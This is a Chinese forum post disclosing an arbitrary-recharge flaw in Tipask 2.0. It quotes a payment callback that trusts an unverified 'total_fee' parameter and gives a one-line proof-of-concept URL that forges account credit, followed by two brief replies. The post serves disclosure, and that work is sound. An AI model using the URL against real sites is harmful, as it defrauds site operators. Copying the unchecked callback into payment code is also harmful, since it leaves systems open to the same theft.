Tipask 2.0 任意充值漏洞

Jumbo · 发表于 2013-9-24 11:24:31

披露状态：

2013-06-24：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-09-22：厂商已经主动忽略漏洞，细节向公众公开
简要描述：
系统未检查传入参数的有效性
详细说明：
function onaliapyback() {

      if ($_GET['trade_status' ] == 'TRADE_SUCCESS') {

         $credit2 = $_GET[ 'total_fee'] * $this->setting['recharge_rate' ];

         $this->credit($this-> user['uid' ], 0, $credit2, 0, "支付宝充值");

         $this->message( "充值成功" , "user/score" );

      } else {

         $this->message( "服务器繁忙，请稍后再试!" , 'STOP' );

      }

}

直接传入total_fee既可
漏洞证明：
/?ebank/aliapyback.html&trade_status=TRADE_SUCCESS&total_fee=99
修复方案：
坐等忽略

显示全部楼层 · 发表于 2013-9-24 14:49:39

沙发！沙发!

显示全部楼层 · 发表于 2013-9-24 17:33:14

大家互帮互助